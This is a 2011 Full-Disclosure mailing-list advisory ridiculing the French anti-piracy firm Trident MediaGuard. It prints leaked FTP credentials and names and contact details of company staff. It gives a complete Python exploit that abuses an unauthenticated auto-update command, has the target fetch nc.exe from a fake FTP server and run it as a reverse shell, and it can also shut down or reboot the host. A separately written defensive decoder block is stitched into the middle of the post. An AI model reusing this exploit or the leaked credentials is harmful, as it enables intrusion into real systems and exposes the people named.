Message-ID: <BANLkTi=gXd7qCEGpnjvfOM-_xJRh3TAfwQ@mail.gmail.com>
Date: Fri, 20 May 2011 20:59:38 +0200
From: "cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg" <cult.of.the.dead.hadopi.tmg@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Too Many Gremlins for Trident MediaGuard (HADOPI)

-- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET --

--==[ CULT OF THE DEAD HADOPI ]==--
Advisory 2

The HADOPI law or Creation and Internet law (French: Loi favorisant la diffusion et la protection de la création sur Internet, "law promoting the distribution and protection of creative works on the internet") is a French law introduced during 2009, attempting to control and regulate internet access as a means to encourage compliance with copyright laws. "HADOPI" is the government agency created by the eponymous law.
http://en.wikipedia.org/wiki/HADOPI_law

In a previous advisory, we exposed the secret plan of the French government to take over the Internet using a patriotic botnet. A few days after the strategy was exposed, the piece of software was removed by Orange. No more Internet by Orange...

Now, the cult of the dead HADOPI is proud to announce its new advisory (free copy, quote it as much as you want, no tax to be paid):

  Too Many Gremlins for Trident MediaGuard

After such a big failure at creating a patriotic botnet, the French government is trying to build a new army with strong and reliable soldiers: Gremlins. They subcontracted with a private company called Trident MediaGuard. This company is as concealed as Bin Laden in the middle of Pakistan. It is the long arm of the HADOPI and the French government for everything related to 3 strikes laws. Note that they recruit people all over Europe at least. Fear the Gremlins. But they fucked everything up, like DSK.

Who are they?

Trident Media Guard (TMG) is a French company specialized in software to prevent unauthorized copying of files over the Internet.
Founded in 2002 by Alain Guislain and Bastien Casalta, it is located in Saint-Sébastien-sur-Loire near Nantes. It aims to "provide services to major publishing companies of the recording and film industry to stop the loss of revenue due to illegal downloads on peer-to-peer networks."
http://en.wikipedia.org/wiki/Trident_Media_Guard
http://www.societe.com/societe/trident-media-guar-sa-441392586.html

You have to read to the end to learn how to pwn the Gremlins!

Never expose the Mogwai to bright lights
*****************

During a few days around the 14th-15th of May 2011, a "test server" (according to the Too Many Gremlins spokesman) was exposed on the Internet. It was supposed to be used for R&D only. This server (91.189.104.82) gave some files revealing what Too Many Gremlins is filtering, and how they are working. You can retrieve all the files here:
http://pastebin.com/Rc1zGXu0

They should remember it is better to close the door before going into the bathroom. You never know, a maid could come in.

Never trust 91.189.104.0 - 91.189.111.255
-------------------------------

When you look for information about 91.189.104.82, you discover it belongs to:

$ whois 91.189.104.82
Inetnum:        91.189.104.0 - 91.189.111.255
netname:        FARM04
descr:          Trident Mediguard
country:        FR
org:            ORG-TA253-RIPE
admin-c:        CB1756-RIPE
tech-c:         CB1756-RIPE

person:         Casalta Bastien
address:        Trident Mediguard
                13 rue de la Tour d'Auvergne
                44200 Nantes
                FR
phone:          +33 2 40 12 00 97
fax-no:         +33 2 40 35 36 79
e-mail:         casalta@...iaguard.info
nic-hdl:        CB1756-RIPE

route:          91.189.104.0/21
descr:          Trident Mediguard
origin:         AS174
mnt-by:         COGENT-ROUTE-MNT

Gremlins, especially French ones, are horny and tend to reproduce very quickly. They need at least a /21! So, if you don't want gremlins to get you, just ban these IPs. Hmmm, maybe they noticed people already do that.
So maybe now they are using the same trick everyone does to bypass the 3 strikes law: a VPN.

On a side note, quite funny:

$ host mediaguard.info
mediaguard.info has address 212.53.95.124
mediaguard.info mail is handled by 10 smtp99.nagra.com.

WTF is mediaguard doing with Nagra!

Back to the future
-------------------------------

Gremlins can look so nice, so sweet, so kind, especially when they promise to the government: "Sir, yes Sir, all privacy will be kept secret. We care about privacy, security, we really do, as long as you pay us."

But of course, leaks happen, like in 2007 with Media Defender (just google for "mediadefender email leak"). There, you could find emails from Bastien Casalta, asking Media Defender not to block some IP ranges:

From: Bastien Casalta
To: Ben Grodsky
Sent: Thu Aug 30 01:01:56 2007
Subject: IP Blocks

Hello Ben,

- you can ignore the following ip blocks:

82.138.81.0 /24
82.138.88.0 /22
91.189.104.0 /21
130.117.41.0 /24
130.117.115.128 /25

Best,
Bastien

TMG
13, rue de la Loire - Bât D
44230 St Sébastien Sur Loire
Tel 02 40 12 00 97
Fax 02 40 35 36 79
contact_at_tmg.eu

It seems the range where the leak of the so-called test server 91.189.104.82 happened already belonged to the Gremlins in 2007. Maybe you want to ban these ranges too.

BTW, if you want to get in touch with Bastien Casalta, use the proper email: casalta(at)tmg.eu

Gimme money
------------------------------

French politics can be very perv (yes, DSK is not the only one). They succeed in taking taxes from people and giving them to innovative companies. In 2005, Too Many Gremlins got 40.000 Euro from an official agency supposed to help "innovative companies". You see, all French are perverse: they pay taxes to get big brothered.
http://www.reseau-entreprendre-atlantique.fr/reseau-entreprendre-atlantique/fr/s04_laureats/s04p03_fiche_laureat.php?laureat=1897

Patents
------------------------------

The gremlins are very possessive. As such, they try to protect their "precious".
And nowadays, you don't have to hide for centuries in a cave: you patent your idea!

* http://www.faqs.org/patents/app/20090210492
  Patent application title: METHOD FOR COMBATTING THE ILLICIT DISTRIBUTION OF PROTECTED MATERIAL AND COMPUTER SYSTEM FOR CARRYING OUT SAID METHOD
  Inventors: Alain Guislain (St. Sebastien Sur Loire, FR), Bastien Casalta (Nantes, FR), Soufiane Rouibia (Nantes, FR)
  IPC8 Class: AG06F1516FI
  USPC Class: 709204
  Publication date: 08/20/2009
  Patent application number: 20090210492
  Abstract: The invention relates to a method for hindering or preventing the illegal distribution of protected data in a peer-to-peer network comprising at least one peer operating an exchange programme designed for distribution of data to at least one client according to a selective exchange protocol permitting the peer to operate a selection of clients to which the data is transferred, said selection being carried out as a function of one or more characteristics of the clients. In said method bogus data is sent to the peer such as to influence the selection of clients served by the peer, such that the peer is made to favour the transfer to authorised clients.

* http://www.faqs.org/patents/app/20100036935
  Patent application title: METHOD FOR REACTING TO THE BROADCAST OF A FILE IN A P2P NETWORK
  Inventors: Bastien Casalta (Nantes, FR), Soufiane Rouibia (Nantes, FR)
  IPC8 Class: AG06F1516FI
  USPC Class: 709219
  Publication date: 02/11/2010
  Patent application number: 20100036935
  Abstract: A method for establishing connections with a number of peers of a peer to peer network operating using at least one exchange protocol, such as to influence the broadcast of a file within a peer to peer network, the addresses of the number of peers being held by at least one network server. A connection is established with the network server such as to at least partially download the addresses of the number of peers connected to the network and implicated in the downloading of the file, to a control server, then connections are established between at least one control client exchanging data with the control server and peers the addresses of which have been downloaded to the control server, such as to download content from a peer to a controlled client or broadcast content from a controlled client to a peer, the downloading or broadcasting being carried out according to the exchange protocol.

How to contact them
-----------------------------

If you want to get in touch with the Gremlins leaders:

* Alain Guislain, CEO
  http://fr.linkedin.com/pub/alain-guislain/1/215/952
* Bastien Casalta, CTO
  http://www.linkedin.com/profile/view?id=4004355
* Soufiane Rouibia, R&D manager
  http://fr.linkedin.com/pub/soufiane-rouibia/5/684/5b8

Or visit the empty website: http://tmg.eu

Never get it wet
*****************

Ok, ok, it was a bit long. But you have to learn what Gremlins are to understand this evil power. Let us have a look now at what was on that server.

A list of names
--------------------------------

In server_interface.exe, which the Gremlins are spreading, you can find a list of ... we don't know what yet. You can easily find it everywhere on the Internet now. Just look for KingElvis, jay@...oo.se and melon_foli, and you will find the list. Here, we are very disappointed: we cannot determine what this list is for :( Are these the names of the Gremlins? Or nicks of the humans they ate? No way to know.

Save your FTP password on the server itself
------------------------

No need to comment here...

91.189.104.82/test/script>> cat cmd_auto_update_cmd_file.txt
share
hFd38+1E
prompt
pasv
mget "script/script_diff2/execute_update.bat"
mget "script/script_diff2/cmd_execute_update_cmd_file.txt"

Oh yes!
Just in case they erase the above file, it is also in cmd_update_cmd_file.txt. Remember, the Gremlins are supposed to protect your private data.

Never feed it after midnight
*****************

Too Many Gremlins is an innovative company. Let us see how innovative the way they develop is, and as such the way they protect the private data they gather.

Among the files they shared, one is called server_interface.exe. It is a Delphi service (welcome to the 90s) listening on TCP/8500.

Advanced features: authentication
-----------------------------

As they keep stating, Too Many Gremlins is on the edge of technology. The patents show how true it is. Sadly, we could not find their patent on authentication ... maybe because you do not need to authenticate! Anyone can connect to this server and send commands. :) This is called sharing, isn't it?

Advanced feature: protocol design
----------------------------

The protocol is very simple:

- the first four bytes must be \x15\x66\x00\x78
- the next byte determines the command:
  - \x65: shutdown the computer
  - \x66: reboot the computer
  - \x70: execute stop_P2P_client.bat
    - the next two bytes are used as the size to get the output of this script
  - \x71: execute start_P2P_client.bat
    - the next two bytes are used as the size to get the output of this script
  - \x81: execute transfer_set.bat
    - the next double word is the IP address to download files from using FTP
    - the next word is the port to use
    - the next two bytes are used as the size to get the output of this script
  - \x82: execute auto_update.bat
    - the next double word is the IP address to download files from using FTP
    - the next word is the port to use
    - the next two bytes are used as the size to get the output of this script

As an exercise, you can code the proper Scapy classes.
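For readers who would rather start from the defender's side, here is an added example (not part of the advisory, and not TMG's code) written in plain Python 3 rather than Scapy: a decoder for the request framing listed above, plus triage rules of the kind an IDS or log pipeline would apply to anything seen on TCP/8500. Field widths follow the advisory's list. Byte order is an assumption: the IP address is read as four bytes in dotted order and the port and size words as big-endian, which is what the posted script emits on a little-endian host. The sample frames, the allowlist and the addresses 10.0.0.5 and 203.0.113.9 are constructed for the example, and the severity labels are the example's own choice.

```python
"""Decoder and triage rules for the TCP/8500 control protocol described above.

Added example, not the advisory's or TMG's code. Field widths follow the
advisory's list; byte order is an assumption (dotted-order IP, big-endian
port and size words, matching what the posted script emits on a
little-endian host). Sample frames and the allowlist are constructed.
"""
import ipaddress
import struct

MAGIC = b"\x15\x66\x00\x78"

# command byte -> (name, carries an output-size word, carries an FTP host/port)
COMMANDS = {
    0x65: ("shutdown", False, False),
    0x66: ("reboot", False, False),
    0x70: ("stop_P2P_client", True, False),
    0x71: ("start_P2P_client", True, False),
    0x81: ("transfer_set", True, True),
    0x82: ("auto_update", True, True),
}


def decode_command(payload):
    """Parse one request frame; returns None if it is not this protocol at all."""
    if len(payload) < 5 or payload[:4] != MAGIC:
        return None
    code = payload[4]
    frame = {"code": code, "command": "unknown", "malformed": True}
    if code not in COMMANDS:
        return frame
    name, has_size, has_target = COMMANDS[code]
    frame["command"] = name
    offset = 5
    if has_target:
        if len(payload) < offset + 6:
            return frame  # truncated: no host/port present
        frame["ftp_host"] = str(ipaddress.IPv4Address(payload[offset:offset + 4]))
        frame["ftp_port"] = struct.unpack(">H", payload[offset + 4:offset + 6])[0]
        offset += 6
    if has_size:
        if len(payload) < offset + 2:
            return frame  # truncated: no size word present
        frame["output_size"] = struct.unpack(">H", payload[offset:offset + 2])[0]
        offset += 2
    frame["malformed"] = False
    frame["trailing_bytes"] = len(payload) - offset
    return frame


def assess(payload, allowed_update_hosts):
    """Rate a frame for an IDS or log pipeline; returns (severity, reason)."""
    frame = decode_command(payload)
    if frame is None:
        return ("none", "not a TMG control frame")
    if frame["malformed"]:
        return ("medium", "unknown or truncated TMG command 0x%02x" % frame["code"])
    name = frame["command"]
    if name in ("transfer_set", "auto_update"):
        target = "%s:%d" % (frame["ftp_host"], frame["ftp_port"])
        if frame["ftp_host"] not in allowed_update_hosts:
            # the auto_update.bat problem: fetch from any host the client names, then execute
            return ("critical", "%s fetching from non-allowlisted FTP source %s" % (name, target))
        return ("medium", "%s from allowlisted source %s (still unauthenticated)" % (name, target))
    if name in ("shutdown", "reboot"):
        return ("high", "unauthenticated %s request" % name)
    return ("medium", "unauthenticated %s request" % name)


# constructed sample frames, not captured traffic
SAMPLES = {
    "reboot": MAGIC + b"\x66",
    "stop": MAGIC + b"\x70\x00\x00",
    "update_internal": MAGIC + b"\x82" + bytes([10, 0, 0, 5]) + b"\x00\x15" + b"\x00\x00",
    "update_external": MAGIC + b"\x82" + bytes([203, 0, 113, 9]) + b"\x00\x15" + b"\x00\x00",
    "truncated": MAGIC + b"\x82\x0a\x00",
    "http": b"GET / HTTP/1.0\r\n",
}
ALLOWED_UPDATE_HOSTS = {"10.0.0.5"}  # constructed: the only legitimate update server


def triage(samples=SAMPLES, allowed=ALLOWED_UPDATE_HOSTS):
    """Run assess() over a dict of frames; returns {label: (severity, reason)}."""
    return {label: assess(frame, allowed) for label, frame in samples.items()}


if __name__ == "__main__":
    for label, (severity, reason) in triage().items():
        print("%-16s %-8s %s" % (label, severity, reason))
```

The allowlist check is the part worth keeping: a service that fetches and runs code from whatever host the client names needs, at minimum, a pinned update source and a signature check on what it downloads, and until then the only practical control is to keep TCP/8500 off the Internet and alert on any frame whose FTP target is not the known update server.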
Please, drop your submissions to http://trac.secdev.org/scapy

Advanced features: pwn the Gremlins
--------------------------

Let us have a look at auto_update.bat, used by command \x82:

91.189.104.82/test/script>> cat auto_update.bat
@echo off
echo auto_update.bat
echo Transfering files from %1:%2, exiting in 10 sec
if (%1 == "") exit
echo Update cmd file
ftp -s:"C:\script\cmd_auto_update_cmd_file.txt" %1
execute_update.bat %1 %2
echo auto_update.bat completed

I think you have spotted the problem :) An attacker can use the "Auto Update" feature (\x82) to force the server to download updates from an evil FTP server he controls. Of course, a downloaded file is executed just after the download...

Hence, anyone who wants to raise an army against Too Many Gremlins, look for open bar on TCP 8500. Here is the gift to you from the cult of the dead HADOPI.

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
$> cat Too_Many_Greemlins_exposed_to_the_sunlight.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import sys
import struct
import time
import socket
from threading import Thread

#
# Change this IP to your public IP address.
#
PUBLIC_IP = "192.168.0.1"

#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
SRV_PORT = 8500
FTP_PORT = 21
SHELL_PORT = 8501

MAGIC = "\x15\x66\x00\x78"
HALT = "\x65"
REBOOT = "\x66"
STOP = "\x70\x00\x00"
UPDATE = "\x82"
OK = "\x01"

def usage (msg = None):
    if msg:
        print "Error: %s\n" % msg
    print "Usage: %s IP command" % sys.argv[0]
    print
    print "commands:"
    print "- halt     shutdown the server"
    print "- reboot   reboot the server"
    print "- stop     stop P2P clients (eMule and Shareaza)"
    print "- pwn      use a vulnerability in the Auto Update feature to get a remote shell"
    sys.exit(0)

class fake_ftpd(Thread):
    def __init__ (self):
        Thread.__init__(self)
        self.s = None

        f = open('./nc.exe', 'rb')
        nc = f.read()
        f.close()

        batch = "@echo off\r\n"
        batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
        batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)

        self.files = {
            'script/script_diff2/execute_update.bat': batch,
            'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
        }

    def run (self):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.s.bind(("", FTP_PORT))
        self.s.listen(1)
        self.s.listen(0x1337)

        print "[+] Waiting for FTP connection..."
        conn, addr = self.s.accept()
        print "[!] FTP - %s connected!" % addr[0]
        conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")

        while True:
            data = conn.recv(1024)
            if not data:
                break
            args = data.rstrip().split(' ')

            if data.startswith('CWD'):
                conn.send('250 CWD command successful.\r\n')
            elif data.startswith('TYPE'):
                conn.send('200 TYPE set.\r\n')
            elif data.startswith('USER'):
                conn.send('331 Password required.\r\n')
                username = data.split(' ')[1].rstrip()
            elif data.startswith('PASS'):
                conn.send('230 User logged in.\r\n')
                password = data.split(' ')[1].rstrip()
                print "[!] TMG credentials: %s/%s" % (username, password)
            elif data.startswith('PORT'):
                arg = args[1].split(',')
                ip = '.'.join(arg[:4])
                port = int(arg[4]) * 256 + int(arg[5])
                sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sdata.connect((ip, port))
                conn.send('200 PORT command successful.\r\n')
            elif data.startswith('RETR'):
                conn.send('150 Opening BINARY mode data connection\r\n')
                buf = self.files.get(args[1], 'file not found\r\n')
                sdata.send(buf)
                sdata.close()
                conn.send('226 Transfer complete\r\n')
                print "[+] File \"%s\" transfered..." % args[1]
            elif data.startswith('NLST'):
                conn.send('150 Here comes the directory listing.\r\n')
                if len(args) == 1:
                    listing = ''
                else:
                    listing = args[1]
                sdata.send(listing + '\r\n')
                sdata.close()
                conn.send('226 Directory send OK.\r\n')
            elif data.startswith('QUIT'):
                conn.send('221 Goodbye.\r\n')
                break
            else:
                conn.send('500 Unknown command.\r\n')

        conn.close()

def do_stuff (host, cmd):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
        s.connect((host, SRV_PORT))
    except Exception, e:
        print("[?] Error: %s" % e)
        s.close()
        return ;

    print "[+] Sending evil packet..."
    if cmd == 'halt':
        s.send(MAGIC + HALT)
        print "[!] Done!"
    elif cmd == 'reboot':
        s.send(MAGIC + REBOOT)
        print "[!] Done!"
    elif cmd == 'stop':
        s.send(MAGIC + STOP)
        data = s.recv(1)
        if data and data[0] == OK:
            print "[!] Done!"
        else:
            print "[!] Error :("
    elif cmd == 'pwn':
        ftpd = fake_ftpd()
        ftpd.daemon = True
        ftpd.start()

        command = socket.inet_aton(PUBLIC_IP) + struct.pack("h", socket.ntohs(FTP_PORT)) + "\x00\x00"
        s.send(MAGIC + UPDATE + command)
        data = s.recv(1)
        if data and data[0] == OK:
            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s2.bind(("", SHELL_PORT))
            s2.listen(1)
            conn, addr = s2.accept()
            print "[!] SHELL - %s connected!" % addr[0]
            print conn.recv(4096)
            while True:
                cmd = raw_input()
                if cmd == "quit" or cmd == "exit":
                    break;
                conn.send(cmd + "\r\n")
                data = ""
                conn.settimeout(None)
                data = conn.recv(1024)
                conn.settimeout(1)
                while True:
                    line = ""
                    try:
                        line = conn.recv(1024)
                    except socket.timeout:
                        break
                    if line == "":
                        break
                    data += line
                tab = data.split("\n")
                print "\n".join(tab[1:-1])
            conn.close()
        else:
            print "[!] Error :("

    s.close()

if __name__ == '__main__':
    if len(sys.argv) < 3:
        usage("Not enough arguments")
    (_, host, cmd) = sys.argv
    if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
        usage('Invalid command ("%s")' % cmd)
    do_stuff(host, cmd)
    sys.exit(0)
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Famous last words
*****************

Whether or not this was a test server, it does not matter. It just shows how reliable Too Many Gremlins can be. The piece of software is as good as Orange's one described in our previous advisory. Even a kid could pwn them. Scary.

The French evil master plan agency HADOPI stated they are going to inspect Too Many Gremlins in order to assess if they are secure now. I hope they also had a look at their code. Oh no! They cannot. Reverse engineering is mostly illegal in France. So we should just trust the Gremlins.

Greets
******

N. Sarkozy, Chinese fellows, C. Albanel, F. Mitterrand, J-L. Warsmann, F. Riester, F. Lefebvre, J-L. Masson, J. Myard, M. Thiollière, M. Marland-Militello

-- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/